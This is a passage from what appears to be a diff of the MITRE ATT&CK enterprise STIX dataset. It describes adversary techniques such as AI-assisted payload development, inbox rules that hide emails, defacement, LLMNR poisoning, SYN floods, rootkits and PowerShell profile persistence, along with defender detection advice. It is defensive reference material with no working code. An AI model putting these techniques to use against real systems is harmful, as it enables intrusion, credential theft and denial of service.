malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)\n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e", + "created": "2024-03-11T13:37:31.836Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588/007", + "external_id": "T1588.007" + }, + { + "source_name": "MSFT-AI", + "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.", + "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/" + }, + { + "source_name": "OpenAI-CTI", + "description": "OpenAI. (2024, February 14). Disrupting malicious uses of AI by state-affiliated threat actors. Retrieved March 11, 2024.", + "url": "https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-16T16:41:53.957Z", + "name": "Email Hiding Rules", + "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Dor Edry, Microsoft", + "Liran Ravich, CardinalOps" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "created": "2021-06-07T13:20:23.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/008", + "external_id": "T1564.008" + }, + { + "source_name": "MacOS Email Rules", + "description": "Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.", + "url": "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac" + }, + { + "source_name": "Microsoft BEC Campaign", + "description": "Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/" + }, + { + "source_name": "Microsoft Mail Flow Rules 2023", + "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.", + "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + }, + { + "source_name": "Microsoft Inbox Rules", + "description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.", + "url": "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59" + }, + { + "source_name": "Microsoft New-InboxRule", + "description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps" + }, + { + "source_name": "Microsoft Set-InboxRule", + "description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps" + }, + { + "source_name": "Microsoft Cloud App Security", + "description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.", + "url": "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "External Defacement", + "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "created": "2020-02-20T14:34:08.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1491/002", + "external_id": "T1491.002" + }, + { + "source_name": "FireEye Cyber Threats to Media Industries", + "description": "FireEye. (n.d.). Retrieved April 19, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf" + }, + { + "source_name": "Kevin Mandia Statement to US Senate Committee on Intelligence", + "description": "Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019.", + "url": "https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf" + }, + { + "source_name": "Anonymous Hackers Deface Russian Govt Site", + "description": "Andy. (2018, May 12). ‘Anonymous’ Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019.", + "url": "https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/" + }, + { + "source_name": "Trend Micro Deep Dive Into Defacement", + "description": "Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T04:03:07.164Z", + "name": "Encrypted/Encoded File", + "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "David Galazin @themalwareman1", + "Andrew Northern, @ex_raritas", + "Jai Minton, @Cyberraiju" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "created": "2024-03-29T12:38:17.135Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/013", + "external_id": "T1027.013" + }, + { + "source_name": "File obfuscation", + "description": "Aspen Lindblom, Joseph Goodwin, and Chris Sheldon. (2021, July 19). Shlayer Malvertising Campaigns Still Using Flash Update Disguise. Retrieved March 29, 2024.", + "url": "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/" + }, + { + "source_name": "SFX - Encrypted/Encoded File", + "description": "Jai Minton. (2023, March 31). How Falcon OverWatch Investigates Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads. Retrieved March 29, 2024.", + "url": "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "LLMNR/NBT-NS Poisoning and Relay", + "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Eric Kuehn, Secure Ideas", + "Matthew Demaske, Adaptforward" + ], + "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1171", + "external_id": "T1171" + }, + { + "source_name": "Wikipedia LLMNR", + "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.", + "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution" + }, + { + "source_name": "TechNet NetBIOS", + "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.", + "url": "https://technet.microsoft.com/library/cc958811.aspx" + }, + { + "source_name": "byt3bl33d3r NTLM Relaying", + "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.", + "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html" + }, + { + "source_name": "Secure Ideas SMB Relay", + "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.", + "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html" + }, + { + "source_name": "GitHub NBNSpoof", + "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.", + "url": "https://github.com/nomex/nbnspoof" + }, + { + "source_name": "Rapid7 LLMNR Spoofer", + "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.", + "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response" + }, + { + "source_name": "GitHub Responder", + "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", + "url": "https://github.com/SpiderLabs/Responder" + }, + { + "source_name": "Sternsecurity LLMNR-NBTNS", + "description": "Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.", + "url": "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning" + }, + { + "source_name": "GitHub Conveigh", + "description": "Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.", + "url": "https://github.com/Kevin-Robertson/Conveigh" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "IP Addresses", + "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "created": "2020-10-02T15:59:11.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/005", + "external_id": "T1590.005" + }, + { + "source_name": "WHOIS", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", + "url": "https://www.whois.net/" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "OS Exhaustion Flood", + "description": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "created": "2020-02-20T15:27:18.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1499/001", + "external_id": "T1499.001" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "Cloudflare SynFlood", + "description": "Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.", + "url": "https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/" + }, + { + "source_name": "Corero SYN-ACKflood", + "description": "Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.", + "url": "https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html" + }, + { + "source_name": "Arbor AnnualDoSreport Jan 2018", + "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", + "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Rootkit", + "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "File Monitoring", + "Host Intrusion Prevention Systems", + "Application Control", + "Signature-based Detection", + "System Access Controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "created": "2017-05-31T21:30:26.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1014", + "external_id": "T1014" + }, + { + "source_name": "CrowdStrike Linux Rootkit", + "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", + "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/" + }, + { + "source_name": "BlackHat Mac OSX Rootkit", + "description": "Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.", + "url": "http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf" + }, + { + "source_name": "Symantec Windows Rootkits", + "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.", + "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf" + }, + { + "source_name": "Wikipedia Rootkit", + "description": "Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.", + "url": "https://en.wikipedia.org/wiki/Rootkit" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-20T17:04:13.976Z", + "name": "PowerShell Profile", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady 